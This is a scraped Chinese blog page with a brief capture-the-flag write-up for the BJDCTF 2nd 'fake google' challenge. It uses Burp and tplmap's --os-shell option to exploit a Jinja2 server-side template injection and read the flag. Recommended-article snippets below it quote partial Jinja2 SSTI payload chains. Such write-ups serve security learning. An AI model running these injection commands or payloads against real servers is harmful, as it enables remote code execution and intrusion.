[BJDCTF 2nd]fake google

最新推荐文章于 2020-12-03 19:24:57 发布

aur03a

最新推荐文章于 2020-12-03 19:24:57 发布

阅读量242

点赞数

分类专栏： ctf

本文链接：https://blog.youkuaiyun.com/weixin_43152809/article/details/109359305

版权

ctf 专栏收录该内容

15 篇文章

订阅专栏

本文介绍了一种利用tplmap工具探测SSTI（服务器侧模板注入）漏洞的方法。通过实例演示了如何下载并配置tplmap，以及如何设置参数以成功获取目标系统的shell，最终读取到flag。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

输入1，随后使用burp抓包
在这里插入图片描述
发现了ssssssti & a little trick，猜测是ssti模板注入
使用tplmap检测
tplmap下载

git clone https://github.com/epinna/tplmap

下载后进入目录，随后输入

./tplmap.py -u http://6275911e-886c-490e-9331-2914d4081cda.node3.buuoj.cn/qaq?name=--os-shell

运行结果：
在这里插入图片描述
可以看到模板是jinja2
随后输入：

./tplmap.py -u http://6275911e-886c-490e-9331-2914d4081cda.node3.buuoj.cn/qaq?name=1  --os-shell --engine=Jinja2

在这里插入图片描述
成功看到了flag

当然也可以使用手工注入

在这里插入图片描述

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

aur03a

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

BUUCTF__[BJDCTF 2nd]fake google_题解

风过江南乱的博客

07-16

836

SSTI/沙盒逃逸详细总结 SSTI模板注入服务端模板注入攻击

BJDCTF 2nd WEB

A_dmin的博客

03-24

8028

BJDCTF 2nd WEB emmm，比赛做了几道题，赛后官方给了wp，把没做出来的复现一下，，，， [BJDCTF 2nd]fake google 一个SSTI，发现是jinja2的，直接用payload打就行： {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__=='_IterationGuard' %...

参与评论您还未登录，请先登录后发表或查看评论

BJDCTF 2nd(WEB复现)

ChenZIDu的博客

04-02

938

记录一下，以后忘记了还能看看 fake google-飞机票 duangShell .index.php.swp源码泄露一进去提示我们：how can i give you source code? .swp?!,获取源码后，利用vim再把它改回去就行，直接打开会乱码:vim -r index.php.swp恢复。因为exec()无回显，而且没有禁curl。所以可以反弹shell~~ ...

fake-gcs-server：Google Cloud Storage模拟器和测试库

02-04

fake-gcs-server为Google Cloud Storage API提供了一个模拟器。它可以用作Go项目中的库和/或独立的二进制/ Docker映像。该库位于包中，可以在Go包的测试套件中使用。该仿真器作为二进制文件提供，可以手动构建...

fake_google_login-master_login_html_login-master_fake_google_

10-01

在这个名为 "fake_google_login-master_login_html_login-master_fake_google_" 的项目中，我们主要探讨的是创建一个仿冒的谷歌登录网页。这个项目对于学习HTML、CSS和JavaScript基础，以及理解网络钓鱼攻击的防范...

[BJDCTF 2nd]fake google 1

weixin_45674567的博客

04-22

554

参考文章https://blog.youkuaiyun.com/u011377996/article/details/86776181 确定模块注入：具体网址内容： http://abcfb0f6-5bad-49f4-aadd-115d99530dba.node3.buuoj.cn/qaq?name={%%20for%20c%20in%20[].class.base.subclasses()%20%...

[BJDCTF 2nd]fake google Writeup(SSTI攻击原理分析)

StevenOnesir的博客

12-03

388

利用本题，我们开始讲解简单的SSTI知识。首先进入题目界面，发现是一个大大的google搜索界面（仿制）在搜索栏随意输入后，发现跳转到qaq，并以get方式传入了一个name的变量。然后我们开始修改name变量的值。不要因为我说要讲框架注入咱们就直接上SSTI的payload。。。正常测试找攻击点咱们也该试试1’ 之类的sql注入。。。然后我们发现输入SSTI的表达式构造会出现回显： ?name={{2*2}} 这里附一张各类框架的结构图（网图）：漏洞形成的原因其实与sql等大同小异

[BJDCTF 2nd]fake google -wp

freerats的博客

06-29

278

打开后一个google搜索框，查看源码没什么，随便输入点东西搜索查看源码，提示ssti 测试一下，存在ssti 1 、获取字符串的类对象 ''.__class__ 2 、寻找基类 ''.__class__.__mro__ 3 、寻找可用引用 ''.__class__.__mro__[1].__subclasses__() 在最后面发现模块引擎类型 <class ‘jinja2.ext.Extension’>, <class ‘jinja2.ext._CommentFinder’

[BJDCTF 2nd] web题-fake google

BROTHERYY的博客

07-09

264

复现环境:buuoj.cn 根据提示知道是ssti模板注入，使用tplmap进行注入。发现存在代码执行 tplmap在github上下载，好像只能用py2运行，我在py3运行会报错查看flag flag{9d83b5bd-72fd-468e-93a6-90237a167245}

Beware the Fake Google Chrome OS Download

CURSED!

10-31

465

Google recently announced that it is developing its own operating system based around the Chrome web browser, named appropriately enough Chrome OS . For the past week there have been rumors circulat...

BUU BJDCTF fake google(ssti模板注入) write up 随便学习模板注入

tothemoon的博客

03-31

585

发现提示!，模板注入无疑了验证一下寻找object基类 "".__class__.__bases__ 或 "".__class__.__mro__ 找到os方法 "".__class__.__mro__[1].__subclasses__()[117] 用.init.globals查找os，init初始化类，globals全局查找方法变量参数 "".__class__._...

模板注入(SSTI)攻击(jinja2)